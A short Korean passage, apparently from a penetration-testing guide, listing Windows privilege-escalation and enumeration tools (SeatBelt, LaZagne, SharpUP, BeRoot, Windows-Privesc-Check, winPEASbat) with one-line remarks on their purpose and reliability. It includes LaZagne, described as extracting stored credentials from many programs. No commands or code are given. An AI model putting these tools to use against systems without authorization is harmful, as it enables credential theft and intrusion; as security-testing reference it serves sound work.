SeatBelt -- 잘못된 구성을 검색하기 위해 호스트를 열거합니다 (privesc보다 정보 수집 도구에 가깝습니다) (컴파일 필요) (미리 컴파일된)LaZagne-- 많은 소프트웨어에서 자격 증명을 추출합니다 (github에 미리 컴파일된 exe)SharpUP-- PowerUp의 C# 포트Beroot~~~~ -- 잘못된 구성 확인 (github에 미리 컴파일된 실행 파일). 권장하지 않음. Win10에서 잘 작동하지 않음.
Windows-Privesc-Check -- 가능한 잘못된 구성 확인 (python에서 exe). 권장하지 않음. Win10에서 잘 작동하지 않음.
Bat
winPEASbat-- 이 게시물을 기반으로 생성된 도구 (정상적으로 작동하기 위해 accesschk가 필요하지 않지만 사용할 수 있습니다).